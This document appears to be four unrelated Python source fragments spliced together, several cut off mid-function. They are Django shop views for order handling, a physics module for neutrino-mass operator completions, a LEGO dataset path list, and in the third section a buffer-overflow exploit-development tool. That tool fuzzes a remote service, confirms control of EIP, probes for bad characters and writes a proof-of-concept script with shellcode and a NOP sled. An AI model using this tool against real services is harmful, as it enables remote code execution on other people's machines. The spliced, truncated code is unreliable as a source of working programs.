@login_required(login_url='/login/')
def empty_wish_list(request):
wishes = Wish.objects.filter(user=request.user)
wishes.delete()
response = JsonResponse({'status' : 'success', 'msg': 'wish list emptied' })
response.status_code = 200
return response
@csrf_exempt
@login_required(login_url='/login/')
def make_purchase(request):
if not request.user.shipping_addresses.filter(is_default=True).exists():
response = JsonResponse({'status' : 'error', 'msg': 'your default shipping address is not set', 'shipping': True })
response.status_code = 422
return response
if not request.user.is_verified:
response = JsonResponse({'status' : 'error', 'msg': 'You cannot order without verifying your email', 'profile': True })
response.status_code = 422
return response
if not request.user.phone or request.user.phone == '' :
response = JsonResponse({'status' : 'error', 'msg': 'You cannot order without having a phone number', 'profile': True })
response.status_code = 422
return response
cart = get_cart(request)
if len(cart) > 0:
# create an order
order = Order(user=request.user)
order.shipping_address = request.user.shipping_addresses.filter(is_default=True).first()
orders = []
for item in cart:
# create order_items
order_item = OrderItem(product_id=item.product_id,
quantity=item.quantity, price_per_unit=item.product.price_per_unit
)
orders.append(order_item)
product = Product.objects.get(pk=item.product_id)
if product.quantity == 0:
response = JsonResponse({'status' : 'error',
'msg': '#Item {} is out of stock'.format(product.name),
'out_of_stock': True, 'qty': 'qty_{}'.format(product.pk) })
response.status_code = 422
return response
if product.quantity < int(order_item.quantity):
response = JsonResponse({'status' : 'error',
'msg': 'There are only {} {} left, please change the quantity'\
.format(product.quantity, product.name),
'quantity': True, 'qty': 'qty_{}'.format(product.pk) })
response.status_code = 422
return response
order.save()
# save the orders
for item in orders:
# increase sales count of the product
product = item.product
product.orders_count += int(item.quantity)
product.quantity -= int(item.quantity)
product.save()
item.order = order
item.save()
# send mail to the customers
subject = 'You Just Placed an Order from Tetris'
message = ''
from_email = settings.DEFAULT_FROM_EMAIL or 'Te<NAME> <<EMAIL>>'
recipient_list = (request.user.email,)
html_message = loader.render_to_string(
'emails/customer_order_list.html', {'order': order,'request':request},
)
send_mail(subject, message, from_email, recipient_list, fail_silently=True, html_message=html_message)
# send mail to the admins
subject = '{} Just Placed an Order from Tetris'.format(request.user.username)
message = ''
from_email = settings.DEFAULT_FROM_EMAIL or 'Te<NAME> <<EMAIL>>'
recipient_list = ()
for admin in admins:
recipient_list += (admin.email,)
html_message = loader.render_to_string(
'emails/customer_order_to_admin.html', {'order': order,'request':request},
)
send_mail(subject, message, from_email, recipient_list, fail_silently=True, html_message=html_message)
# clear cart
request.user.cart.all().delete()
request.session['cart'] = []
response = JsonResponse({'status' : 'success', 'msg': 'order successfully made' })
response.status_code = 200
return response
response = JsonResponse({'status' : 'error', 'msg': 'your cart is empty' })
response.status_code = 422
return response
@csrf_exempt
@login_required(login_url='/login/')
def remove_shipping_address(request):
shipping_address = ShippingAddress.objects.filter(user = request.user, pk = request.POST['shipping_id']).first()
if not shipping_address.orders.exists():
shipping_address.delete()
response = JsonResponse({'status' : 'success', 'msg': 'removed successfully' })
response.status_code = 200
return response
response = JsonResponse({'status' : 'error', 'msg': 'you cannot delete this shipping address. An order is shipping to it' })
response.status_code = 422
return response
@csrf_exempt
@login_required(login_url='/login/')
def customer_cancel_order(request):
if not request.POST.get('reason') or request.POST['reason'].strip() == '':
response = JsonResponse({'status' : 'error', 'msg': 'Please enter a reason' })
response.status_code = 422
return response
order = Order.objects.filter(ref=request.POST['order_ref'], user=request.user).first()
if order:
order.status = 'cancelled'
order.reason_cancelled = request.POST['reason'].strip()
order.canceller = request.user
order.save()
# increase stock
for item in order.order_items.all():
# increase sales count of the product
product = item.product
product.orders_count -= int(item.quantity)
product.quantity += int(item.quantity)
product.save()
# send mail to the admins
subject = '{} Just Cancelled an Order from Tetris'.format(request.user.username)
message = ''
from_email = settings.DEFAULT_FROM_EMAIL or 'Tetris Retails <<EMAIL>>'
recipient_list = ()
for admin in admins:
recipient_list += (admin.email,)
html_message = loader.render_to_string(
'emails/customer_cancel_order_to_admin.html', {'order': order,'request':request},
)
send_mail(subject, message, from_email, recipient_list, fail_silently=True, html_message=html_message)
# send mail to the customers
subject = 'You Have Cancelled Order {} from Tetris'.format(order.ref)
message = ''
from_email = settings.DEFAULT_FROM_EMAIL or 'Tetris Retails <<EMAIL>>'
recipient_list = (request.user.email,)
html_message = loader.render_to_string(
'emails/customer_cancel_order.html', {'order': order,'request':request},
)
send_mail(subject, message, from_email, recipient_list, fail_silently=True, html_message=html_message)
response = JsonResponse({'status' : 'success', 'msg': 'Order cancelled successfully' })
response.status_code = 200
return response
response = JsonResponse({'status' : 'error', 'msg': 'an error occured. please try again later' })
response.status_code = 422
return response
@csrf_exempt
@login_required(login_url='/login/')
def customer_confirm_delivery(request):
if not request.POST.get('order_ref'):
response = JsonResponse({'status' : 'error', 'msg': 'the order reference is needed' })
response.status_code = 422
return response
order = Order.objects.filter(ref=request.POST['order_ref'], user=request.user).first()
if order:
order.confirm_delivery_date = datetime.now()
order.status = 'delivered'
order.save()
for order_item in order.order_items.all():
order_item.product.num_deliveries += 1
order_item.product.save()
# send mail to the customers
subject = 'You Have Confirmed Delivery of Order {} from Tetris'.format(order.ref)
message = ''
from_email = settings.DEFAULT_FROM_EMAIL or 'Tetris Retails <<EMAIL>>'
recipient_list = (request.user.email,)
html_message = loader.render_to_string(
'emails/customer_confirm_delivery.html', {'order': order,'request':request},
)
send_mail(subject, message, from_email, recipient_list, fail_silently=False, html_message=html_message)
# send mail to the admins
subject = '{} Just Confirmed the Delivery of Order {}'\
.format(request.user.username, order.ref)
message = ''
from_email = settings.DEFAULT_FROM_EMAIL or 'Tetris Retails <<EMAIL>>'
recipient_list = ()
for admin in admins:
recipient_list += (admin.email,)
html_message = loader.render_to_string(
'emails/customer_confirm_order_to_admin.html', {'order': order,'request':request},
)
send_mail(subject, message, from_email, recipient_list, fail_silently=False, html_message=html_message)
response = JsonResponse({'status' : 'success', 'msg': 'Order delivery confirmed | |
#!/usr/bin/env python3
"""Functions to generate completions of operators with explicit SU(2) structure."""
from neutrinomass.tensormethod.core import (
Index,
Field,
IndexedField,
eps,
delta,
is_invariant_symbol,
Operator,
get_dynkin,
D,
)
from neutrinomass.tensormethod.contract import (
lorentz_singlets,
colour_singlets,
invariants,
contract_su2,
)
from neutrinomass.utils import timeit
from neutrinomass.tensormethod.utils import safe_nocoeff
from neutrinomass.completions.utils import (
flatten,
chunks,
factors,
multiple_replace,
allowed_lor_dyn,
)
from neutrinomass.utils.functions import remove_equivalent, remove_equivalent_nopop
from neutrinomass.completions.core import (
Completion,
Model,
FailedCompletion,
EffectiveOperator,
cons_completion_field,
FieldType,
VectorLikeDiracFermion,
MajoranaFermion,
ComplexScalar,
RealScalar,
)
from neutrinomass.completions.topologies import get_topology_data, Leaf
from neutrinomass.utils import pmatch
from neutrinomass.utils.functions import stringify_qns, conjugate_term
from typing import Tuple, List, Dict, Union
import networkx as nx
import networkx.algorithms.isomorphism as iso
from copy import copy, deepcopy
from alive_progress import alive_bar
from collections import Counter, defaultdict
from itertools import permutations, groupby, combinations
from sympy.tensor.tensor import Tensor
from sympy import prime
from functools import lru_cache, reduce
import re
import os
def replace(data, to_replace, replace_with, found=False) -> Tuple[tuple, bool]:
"""Replace first occurance of ``to_replace`` with ``replace_with`` in
``data``.
Example:
>>> replace((("F", 18), ("S", 45), ...), "F", L('u1 i1'))
((L(u1, i1), 18), ("S", 45), ...), True
"""
if found:
return data, found
if isinstance(data, tuple):
new_data = []
for datai in data:
new_datai, found = replace(datai, to_replace, replace_with, found)
new_data.append(new_datai)
f = lambda x: Leaf(*x) if isinstance(data, Leaf) else tuple(x)
return f(new_data), found
if data == to_replace:
return replace_with, True
return data, found
def replace_fields(fields: List[IndexedField], partition):
"""Takes the fields and puts them in place of the strings in the partition
template.
>>> replace_fields([H('i0_'), H('i1_'), L('u0_ i2_'), L('u1_ i3_')], (('F', 18), ('S', 162), (('F', 6), ('S', 54))))
((L(u0_, i2_), 18), (H(i0_), 162), ((L(u1_, i3_), 6), (H(i1_), 54)))
"""
for field in fields:
char = "S" if field.is_boson else "F"
partition, _ = replace(data=partition, to_replace=char, replace_with=field)
return partition
def quick_remove_equivalent_partitions(partitions):
"""Just remove double ups. (For now.)
This is also a good place to remove partitions that you know will be
filtered out.
"""
return list(set(partitions))
def distribute_fields(fields, partition):
"""Takes the fields and puts them in place of the strings in the partition
template in every possible way.
>>> distribute_fields([H('i0_'), H('i1_'), L('u0_ i2_'), L('u1_ i3_')], (('F', 18), ('S', 162), (('F', 6), ('S', 54))))
[((L(u0_, i2_), 18), (H(i0_), 162), ...), ((L(u1_, i3_), 18), (H(i0_), 162), ...), ...]
Returns lots of double ups.
"""
perms = permutations(fields)
parts = [replace_fields(fields, partition) for fields in perms]
return quick_remove_equivalent_partitions(parts)
def node_dictionary(
partition: tuple, field_dict: Dict[IndexedField, int]
) -> Dict[int, str]:
"""Returns a dictionary mapping node to indexed field label.
Example:
>>> node_dictionary((((Q(u364_, c210_, i369_), 6), (L(u362_, i367_), 18)),
((L(u361_, i366_), 54), (Q(u363_, c209_, i368_), 162)),
((db(u368_, -c214_), 486), (db(u366_, -c212_), 1458))))
{6: 'Q', 18: 'L', ...}
"""
flat_data = list(flatten(partition))
tuples = chunks(flat_data, 2)
reversed_data = list(map(reversed, tuples))
return {k: {"particle": v.label + str(field_dict[v])} for k, v in reversed_data}
def set_external_fields(
partition: tuple, graph: nx.Graph, field_dict: Dict[IndexedField, int]
) -> nx.Graph:
"""Add indexed fields as edge attributes on graph through side effect."""
g = deepcopy(graph)
node_attrs = node_dictionary(partition, field_dict)
edge_attrs = {}
for edge in graph.edges:
for n, field_dict in node_attrs.items():
if n in edge:
edge_attrs[edge] = field_dict
nx.set_edge_attributes(g, edge_attrs)
return g
def indexed_fields_with_counters(op: Operator) -> Dict[IndexedField, int]:
"""Return a dictionary mapping indexed fields to an integer labelling distinct
fields to help with isomorphism filtering.
TODO Need to rewrite this to include colour indices! Need to then move
position of call to include operator with colour structure!
"""
# idxs are the pairs of contracted isospin indices
counts = defaultdict(list)
idxs = []
for f in op.tensors:
if isinstance(f, IndexedField):
counts[f.label].append(f)
else:
idxs.append(f.indices)
labelled_counts = {k: [[f, i] for i, f in enumerate(v)] for k, v in counts.items()}
for k, v in labelled_counts.items():
for (f1, i1), (f2, i2) in combinations(v, 2):
if not f1.indices_by_type["Isospin"]:
# fields are interchangeable, replace
f2_idx = labelled_counts[k].index([f2, i2])
labelled_counts[k][f2_idx] = [f2, i1]
continue
iso1 = f1.indices_by_type["Isospin"][0]
iso2 = f2.indices_by_type["Isospin"][0]
if [-iso1, -iso2] in idxs or [-iso2, -iso1] in idxs:
# combination of indices match an epsilon-index pair. In this
# case, need to replace i2 with i1
f2_idx = labelled_counts[k].index([f2, i2])
labelled_counts[k][f2_idx] = [f2, i1]
else:
continue
flat = reduce(lambda x, y: x + y, labelled_counts.values())
return dict(flat)
def partitions(operator: EffectiveOperator, verbose=False) -> List[dict]:
"""Returns a list of operator partitions, epsilons and graphs of the form:
{"fields": ((L(u0, I_0), 18), ...)
"epsilons": (...),
"graph": ...}
from the partitions of the fields in the operator. This is all of the
information required to find the completion.
"""
topology_data_list = get_topology_data(**operator.topology_type)
colour_ops = colour_singlets([operator.operator], overcomplete=True)
colour_ops = [EffectiveOperator(operator.name, op) for op in colour_ops]
if verbose:
print(
f"Finding partitions of {operator.name}. "
+ f"There are {len(colour_ops)} colour structures and "
+ f"{len(topology_data_list)} relevant topologies."
)
out = []
counter = 1
for topology_data in topology_data_list:
if verbose:
print(f"Furnishing topology {counter}...")
counter += 1
# return counters as well for isomorphism filtering
fields_and_counters = indexed_fields_with_counters(operator.operator)
fields = [f for f, i in fields_and_counters.items()]
perms = distribute_fields(fields, topology_data["partition"])
for op in colour_ops:
# col_out = []
epsilons = op.operator.epsilons
for perm in perms:
g = topology_data["graph"]
g = set_external_fields(perm, g, fields_and_counters)
partition_file = topology_data["partition_file"]
topology_classification = os.path.splitext(
os.path.basename(partition_file)
)[0]
data = {
"operator": op,
"partition": perm,
"epsilons": epsilons,
"graph": g,
"topology": topology_classification,
}
out.append(data)
# if remove_isomorphic_diagrams:
# col_out = remove_isomorphic(col_out)
# out += col_out
return out
def are_equivalent_partitions(a, b):
"""Checks for partition equivalence by checking if the graphs are isomorphic."""
ga = a["graph"]
gb = b["graph"]
if not iso.faster_could_be_isomorphic(ga, gb):
return False
em = iso.categorical_edge_match("particle", "exotic")
return nx.is_isomorphic(ga, gb, edge_match=em)
def graph_fingerprint(part):
g = part["graph"]
degree = dict(g.degree())
return sorted(degree.values())
def remove_isomorphic(partitions: List[dict]) -> List[dict]:
"""Same algorithm as removeIsomorphic in ``wolfram/`` directory. Remove
isomorphic graphs (by side effect) to reduce double-ups of completions.
"""
return remove_equivalent_nopop(partitions, are_equivalent_partitions)
# The approach to finding the completions is the following: contract off fields
# and find corresponding exotic and term. Replace the fields by the exotic and
# keep track of the available epsilons and the terms by mutation. The pipeline is
#
# contract: returns exotic field, new gauge epsilons (fewer) and new lorentz
# epsilons (more)
#
# replace_and_mutate: returns a Leaf structure that enters the partition in
# place of the contracted fields, mutates terms, edge_dict of graph,
# gauge_epsilons and lorentz_epsilons
#
# reduce_partition: applies replace_and_mutate to a partition until last vertex.
def all_scalars(fields: List[Field]) -> bool:
"""Checks if all fields are scalars."""
boolean = True
for f in fields:
boolean = boolean and f.is_boson
return boolean
def all_fermions(fields: List[Field]) -> bool:
"""Checks if all fields are fermions."""
boolean = True
for f in fields:
boolean = boolean and f.is_fermion
return boolean
def drop_scalar(fields: List[Field]) -> List[Field]:
"""Given a list of fields with one scalar, return a list of only the
fermions, i.e. remove the scalar.
"""
scalars, fermions = [], []
for f in fields:
if f.is_boson:
scalars.append(f)
elif f.is_fermion:
fermions.append(f)
assert len(scalars) == 1
return fermions
def get_lorentz_epsilons(fields: Tuple[IndexedField]) -> Tuple[bool, List[Tensor]]:
"""Takes a list of two or three fields (possibly with derivatives) and returns
the lorentz epsilons that contract the fields to as low a Lorentz irrep as
possible as well as a boolean indicating whether the contraction is allowed.
"""
deriv_structure = [f.derivs for f in fields]
n_derivs = sum(deriv_structure)
if n_derivs > 2:
raise Exception(
f"Not currently supporting {n_derivs} derivatives in an operator."
)
if not n_derivs and len(fields) == 4:
return True, []
if not n_derivs and len(fields) == 3:
if all_scalars(fields):
return True, []
elif all_fermions(fields):
return False, []
return get_lorentz_epsilons(drop_scalar(fields))
if n_derivs == 2 and len(fields) == 3:
fields = sorted(fields, key=lambda f: -f.derivs)
prod = reduce(lambda x, y: x * y, fields)
undotted, dotted, _, _, _, = prod.indices_by_type.values()
# Reject vector contraction
if len(undotted) == 1 and len(dotted) == 1:
return False, []
epsilons = []
for indices in [undotted, dotted]:
# skip single indices (fermion, scalar) contraction
if len(indices) == 1:
continue
# pair up all even indices; if odd, leave last index
if len(indices) % 2 != 0:
indices.pop(-1)
for i, j in chunks(indices, 2):
epsilons.append(eps(f"-{i} -{j}"))
return True, epsilons
def is_contracted_epsilon(eps: Tensor, indices: List[Index]) -> bool:
"""Return True if two indices on epsilon are contracted, False otherwise."""
i, j, *k = | |
<gh_stars>1-10
# -*- coding: utf-8 -*-
import traceback
import time
import json
import re
# - - - - - - - - - - - - - - - - - - - - - - - -
from lib_socket import *
from lib_primitive import *
# - - - - - - - - - - - - - - - - - - - - - - - -
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def simple_fuzzer (socket, config, steps, max_length=10000):
# socket: oggetto socket
# config: dict di configurazione attacco
# steps: step incrementali
# max_length: grandezza massima payload (predefinita 10000)
char = "\x41" # Char "A" per test
c = steps # Numero di caratteri da inviare
send_status = 0 # Inizializzato a -1 in caso di porta chiusa
cycled = False # Verifica il loop
server_status = socket.check_port ()
while (server_status == 0) and (send_status == 0) and (c <= max_length):
print "[i] Sending " + str(c) + " chars at " + str(config['addr']) + ":" + str(config['port'])
cycled = True
payload = (char * c)
send_status = socket.run_protocol_exploit(config, payload)
server_status = socket.check_port ()
c += steps
time.sleep(1) # Attesa fra una richiesta e l'altra
server_status = socket.check_port ()
if (cycled) and (server_status != 0) or (send_status != 0):
return c - steps # E' crashato, rimuovo l'ultimo incremento
if (cycled) and (server_status == 0) and (send_status == 0):
return -1 # Non è crashato
else:
return -2
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def eip_check (socket, config, offset):
# socket: oggetto socket
# config: dict di configurazione attacco
# offset: grandezza dell'offset
char = "\x41" # Char "A" per overflow
eip_char = "\x42" * 4 # Char "B" per test EIP
server_status = socket.check_port ()
if (server_status == 0):
payload = (char * offset) + eip_char
return socket.run_protocol_exploit(config, payload)
else:
return -1
def space_check (socket, config, offset):
# socket: oggetto socket
# config: dict di configurazione attacco
# offset: grandezza dell'offset
char = "\x41" # Char "A" per overflow
eip_char = "\x42" * 4 # Char "B" per test EIP
space = "\x43" * 2000 # Char "C" per test spazio
server_status = socket.check_port ()
if (server_status == 0):
payload = (char * offset) + eip_char + space
return socket.run_protocol_exploit(config, payload)
else:
return -1
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def send_badchar (socket, config, offset, ex_chars, space, preeip):
# socket: oggetto socket
# config: dict di configurazione attacco
# offset: grandezza dell'offset
# ex_chars: caratteri esclusi (deve essere un array di char da escludere)
# space: spazio disponibile dopo indirizzo EIP (non utilizzato)
# preeip: stabilisce se i badchar vanno inviari prima dell'eip
try:
badchar_arr = [
"\x00", "\x01", "\x02", "\x03", "\x04", "\x05", "\x06", "\x07", "\x08", "\x09", "\x0a",
"\x0b", "\x0c", "\x0d", "\x0e", "\x0f", "\x10", "\x11", "\x12", "\x13", "\x14", "\x15",
"\x16", "\x17", "\x18", "\x19", "\x1a", "\x1b", "\x1c", "\x1d", "\x1e", "\x1f", "\x20",
"\x21", "\x22", "\x23", "\x24", "\x25", "\x26", "\x27", "\x28", "\x29", "\x2a", "\x2b",
"\x2c", "\x2d", "\x2e", "\x2f", "\x30", "\x31", "\x32", "\x33", "\x34", "\x35", "\x36",
"\x37", "\x38", "\x39", "\x3a", "\x3b", "\x3c", "\x3d", "\x3e", "\x3f", "\x40", "\x41",
"\x42", "\x43", "\x44", "\x45", "\x46", "\x47", "\x48", "\x49", "\x4a", "\x4b", "\x4c",
"\x4d", "\x4e", "\x4f", "\x50", "\x51", "\x52", "\x53", "\x54", "\x55", "\x56", "\x57",
"\x58", "\x59", "\x5a", "\x5b", "\x5c", "\x5d", "\x5e", "\x5f", "\x60", "\x61", "\x62",
"\x63", "\x64", "\x65", "\x66", "\x67", "\x68", "\x69", "\x6a", "\x6b", "\x6c", "\x6d",
"\x6e", "\x6f", "\x70", "\x71", "\x72", "\x73", "\x74", "\x75", "\x76", "\x77", "\x78",
"\x79", "\x7a", "\x7b", "\x7c", "\x7d", "\x7e", "\x7f", "\x80", "\x81", "\x82", "\x83",
"\x84", "\x85", "\x86", "\x87", "\x88", "\x89", "\x8a", "\x8b", "\x8c", "\x8d", "\x8e",
"\x8f", "\x90", "\x91", "\x92", "\x93", "\x94", "\x95", "\x96", "\x97", "\x98", "\x99",
"\x9a", "\x9b", "\x9c", "\x9d", "\x9e", "\x9f", "\xa0", "\xa1", "\xa2", "\xa3", "\xa4",
"\xa5", "\xa6", "\xa7", "\xa8", "\xa9", "\xaa", "\xab", "\xac", "\xad", "\xae", "\xaf",
"\xb0", "\xb1", "\xb2", "\xb3", "\xb4", "\xb5", "\xb6", "\xb7", "\xb8", "\xb9", "\xba",
"\xbb", "\xbc", "\xbd", "\xbe", "\xbf", "\xc0", "\xc1", "\xc2", "\xc3", "\xc4", "\xc5",
"\xc6", "\xc7", "\xc8", "\xc9", "\xca", "\xcb", "\xcc", "\xcd", "\xce", "\xcf", "\xd0",
"\xd1", "\xd2", "\xd3", "\xd4", "\xd5", "\xd6", "\xd7", "\xd8", "\xd9", "\xda", "\xdb",
"\xdc", "\xdd", "\xde", "\xdf", "\xe0", "\xe1", "\xe2", "\xe3", "\xe4", "\xe5", "\xe6",
"\xe7", "\xe8", "\xe9", "\xea", "\xeb", "\xec", "\xed", "\xee", "\xef", "\xf0", "\xf1",
"\xf2", "\xf3", "\xf4", "\xf5", "\xf6", "\xf7", "\xf8", "\xf9", "\xfa", "\xfb", "\xfc",
"\xfd", "\xfe", "\xff"
]
for c in ex_chars: # Rimuovo i badchar
badchar_arr.remove(c.decode('hex'))
char = "\x41" # Char "A" per overflow
eip_char = "\x42" * 4 # Char "B" per test EIP
extra = "\x43" * 4 # Char "C" per extra (dopo EIP)
badchar_string = ''.join([str(x) for x in badchar_arr]) # Converto badchar_arr in unica stringa
#print badchar_string.encode('hex')
server_status = socket.check_port ()
if (server_status == 0):
payload = ""
if (preeip): payload = char * (offset - len(badchar_string)) + badchar_string + eip_char + extra
else: payload = char * (offset) + eip_char + badchar_string + extra
return socket.run_protocol_exploit(config, payload)
else:
return -1
except Exception, e:
traceback.print_exc(e)
return -3
def build_poc (config, SESSION, filename, nnops=16):
# config: dict di configurazione attacco
# SESSION: dict di sessione
# filename: nome del file dell'exploit
# nnops: il numero di nops da inserire
try:
str_buffer_apprx_length = ""
str_buffer_length = ""
str_eip_value = ""
str_badchar = ""
str_shellcode = ""
sliced_shellcode = ""
str_addr = '"' + str(config ['addr']) + '"'
str_port = str(config ['port'])
str_lbytes = '"' + str_pythonic_escape(config ['lbytes']) + '"'
str_rbytes = '"' + str_pythonic_escape(config ['rbytes']) + '"'
str_buffer_length = ""
str_space = ""
str_return_address = ""
out = '#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\nimport socket\n\n'
if SESSION ['raw_fuzzing']['buffer_apprx_length'] != None:
str_buffer_apprx_length = str(SESSION ['raw_fuzzing']['buffer_apprx_length'])
out += '# RAW FUZZING OFFSET:\tbuffer_apprx_length = ' + str_buffer_apprx_length + '\n'
if SESSION ['precise_fuzzing']['buffer_length'] != None:
str_buffer_length = str(SESSION ['precise_fuzzing']['buffer_length'])
out += '# PRECISE FUZZING:\tbuffer_length = ' + str_buffer_length + '\n'
if SESSION ['precise_fuzzing']['eip_value'] != None:
str_eip_value = '"' + hex_escape(SESSION ['precise_fuzzing']['eip_value']) + '"'
out += '# PRECISE FUZZING:\teip_value = ' + str_eip_value + '\n'
if SESSION ['space_check']['space'] != None:
str_space = str(SESSION ['space_check']['space'])
if SESSION ['find_badchar']['badchar'] != None:
str_badchar = str('\"\\x' if len(SESSION ['find_badchar']['badchar']) > 0 else '') + str('", "\\x'.join([str(x) for x in SESSION ['find_badchar']['badchar']])) + str('\"' if len(SESSION ['find_badchar']['badchar']) > 0 else '')
out += '# BADCHAR Trovati:\tbadchar = [' + str_badchar + ']\n'
if SESSION ['find_return_address']['return_address'] != None:
str_return_address = '"' + hex_escape(SESSION ['find_return_address']['return_address']) + '"'
out += '\n\n'
if SESSION ['shellcode']['shellcode'] != None:
str_shellcode = 'shellcode = ""'
sliced_shellcode = re.findall('.{1,16}', SESSION ['shellcode']['shellcode'].decode('hex'))
for e in sliced_shellcode:
str_shellcode += '\nshellcode += "' + hex_escape(e.encode('hex')) + '"'
out += str_shellcode + '\n\n\n'
out += 'nop = "\\x90"\noffset = "\\x41"\nfill = "\\x43"\n\n'
out += 'target_addr = ' + str_addr + '\ntarget_port = ' + str_port + '\n\n'
out += 'lbytes = ' + str_lbytes + '\nrbytes = ' + str_rbytes + '\n\n'
if SESSION ['precise_fuzzing']['buffer_length'] != None:
out += 'buffer_length = ' + str_buffer_length + '\n'
if SESSION ['space_check']['space'] != None:
out += 'extra_space = ' + str_space + '\n\n'
if SESSION ['find_return_address']['return_address'] != None:
out += 'return_address = ' + str_return_address + '\n\n'
out += '\n\n'
if (
SESSION ['raw_fuzzing']['buffer_apprx_length'] != None and
SESSION ['precise_fuzzing']['buffer_length'] == None and
SESSION ['space_check']['space'] == None and
SESSION ['shellcode']['shellcode'] == None and
SESSION ['find_return_address']['return_address'] == None
):
out += 'buffer_apprx_length = ' + str_buffer_apprx_length + '\n\n\n'
out += '#payload = lbytes + "' + pattern_create(SESSION ['raw_fuzzing']['buffer_apprx_length']) + '" + rbytes' + '\n'
out += 'payload = lbytes + (offset * buffer_apprx_length) + rbytes' + '\n'
elif (
SESSION ['raw_fuzzing']['buffer_apprx_length'] != None and
SESSION ['precise_fuzzing']['buffer_length'] != None and
SESSION ['space_check']['space'] == None and
SESSION ['shellcode']['shellcode'] == None and
SESSION ['find_return_address']['return_address'] == None
):
out += 'buffer_apprx_length = ' + str_buffer_apprx_length + '\n'
out += 'eip_overwrite = "\\x42"\n\n\n'
out += 'payload = lbytes + (offset * buffer_length) + (eip_overwrite * 4) + (fill * (buffer_apprx_length - (buffer_length + 4)) ) + rbytes' + '\n'
elif (
SESSION ['raw_fuzzing']['buffer_apprx_length'] != None and
SESSION ['precise_fuzzing']['buffer_length'] != None and
SESSION ['space_check']['space'] != None and
SESSION ['shellcode']['shellcode'] == None and
SESSION ['find_return_address']['return_address'] == None
):
badchar_str = ""
for x in range(0,256):
badchar_str += ("\\x" + '{:02x}'.format(x))
out += 'eip_overwrite = "\\x42"\n'
out += 'badchar_string = "' + str(badchar_str) + '"' + '\n\n\n'
out += '#payload = lbytes + (offset * buffer_length) + (eip_overwrite * 4) + | |
#!/usr/bin/env python
import ltron.settings as settings
from ltron.dataset.build_dataset import build_dataset
investigate = '''
10036-1 - Pizza To Go.mpd
10128-1 - Train Level Crossing.mpd
10156-1 - LEGO Truck.mpd
10159-1 - City Airport -City Logo Box.mpd
10184 - Town Plan.mpd
10197-1 - Fire Brigade.mpd
10213-1 - Shuttle Adventure.mpd
10214-1 - Tower Bridge.mpd
10264 - Corner Garage.mpd
1029-1 - Milk Delivery Truck - Tine.mpd
106-1 - UNICEF Van.mpd
107-2 - Canada Post Mail Truck.mpd
1096-1 - Race Buggy.mpd
1097-1 - Res-Q Runner.mpd
1180-1 - Space Port Moon Buggy.mpd
1462-1 - Galactic Scout.mpd
1472-1 - Holiday Home.mpd
=============== 2021/2/22 below here ======================
1477-1 - %7BRed Race Car Number 3%7D.mpd
1478-1 - Mobile Satellite Up-Link.mpd
1479-1 - 2-Pilot Craft.mpd
1484-1 - Weetabix Town House.mpd
1489-1 - Mobile Car Crane.mpd
1490-1 - Town Bank.mpd
1496-1 - Rally Car.mpd
1557-1 - Scooter.mpd
1591 - Danone Truck.mpd
1620-1 - Astro Dart.mpd
1621-1 - Lunar MPV Vehicle.mpd
1631-1 - Black Racer.mpd
1632-1 - Motor Boat.mpd
1633-1 - Loader Tractor.mpd
1656-1 - Evacuation Team.mpd
1682-1 - Space Shuttle.mpd
1702-1 - Fire Fighter 4 x 4.mpd
1704-1 - Ice Planet Satellite Plough.mpd
1713-1 - Shipwrecked Pirate.mpd
1714-1 - Surveillance Scooter.mpd
1731-1 - Ice Planet Scooter.mpd
1772-1 - Airport Container Truck.mpd
1773-1 - Airline Main_YbM0Kh4.mpd
1775-1 - Jet.mpd
1792-1 - Pleasure Cruiser.mpd
1793-1 - Space Station Zenon.mpd
1808-1 - Light Aircraft and _3j8215M.mpd
1831-1 - Maersk Line Container Lorry.mpd
1875-1 - Meteor Monitor.mpd
1887-1 - Scout Patrol Ship.mpd
1896-1 - Trauma Team.mpd
1916-1 - Starion Patrol.mpd
1952-1 - Dairy Tanker.mpd
1969-1 - Mini Robot.mpd
1974-4 - Star Quest.mpd
=============== 2021/2/22 above here ======================
20006-1 - Clone Turbo Tank - Mini.mpd
20009-1 - AT-TE Walker - Mini.mpd
20011-1 - Garbage Truck.mpd
20014-1 - 4 x 4 Dynamo.mpd
20019-1 - Slave I.mpd
20021-1 - Bounty Hunter Gunship - Mini.mpd
2140-1 - ANWB Roadside Assistance Crew.mpd
2148-1 - LEGO Truck.mpd
2149-1 - Color Line Container Lorry.mpd
2150-1 - Train Station.mpd
2531-1 - Rescue Helicopter and Jeep.mpd
2541-1 - Adventurers Car.mpd
2542-1 - Adventurers Aeroplane.mpd
2584-1 - Biker Bob.mpd
30030-1 - Racing Car.mpd
30033-1 - Racing Truck.mpd
30034-1 - Racing Tow Truck.mpd
30035-1 - Racing Car.mpd
30036-1 - Buggy Racer.mpd
30050-1 - Republic Attack Shuttle - Mini.mpd
30051-1 - X-wing Fighter - Mini.mpd
30052-1 - AAT - Mini.mpd
30053-1 - Republic Attack Cruiser - Mini.mpd
============= Stopped here for the night =======================
'''
other_intermediate = '''
1972 - Go Kart.mpd
'''
large = '''
10242 - Mini Cooper.mpd
10248 - Ferrari F40.mpd
10252-1 - Volkswagen Beetle.mpd
10258-1 - London Bus.mpd
10271 - Fiat 500.mpd
21307-1 - Caterham Seven 620R.mpd
21307 - Caterham Seven 620R.mpd
'''
dataset_paths = [
'10036-1 - Pizza To Go.mpd:10036 - car.ldr',
'10128-1 - Train Level Crossing.mpd:10128 - car.ldr',
'10156-1 - LEGO Truck.mpd:10156 - truck.ldr',
# big and has custom parts
#'10159-1 - City Airport -City Logo Box.mpd:10159 - airplane.ldr',
'10159-1 - City Airport -City Logo Box.mpd:10159 - helicopter.ldr',
'10159-1 - City Airport -City Logo Box.mpd:10159 - baggage car.ldr',
'10159-1 - City Airport -City Logo Box.mpd:10159 - baggage trailer.ldr',
'10184 - Town Plan.mpd:10184 - car.ldr',
'10184 - Town Plan.mpd:10184 - truck.ldr',
# stuff is poorly named here and model is weird, come back if desperate
#10197-1 - Fire Brigade.mpd
'10213-1 - Shuttle Adventure.mpd:10213 - car.ldr',
'10214-1 - Tower Bridge.mpd:10214 - sub-model a - black london taxi.ldr',
'10214-1 - Tower Bridge.mpd:10214 - sub-model b - green automobile.ldr',
'10214-1 - Tower Bridge.mpd:10214 - sub-model c - yellow truck.ldr',
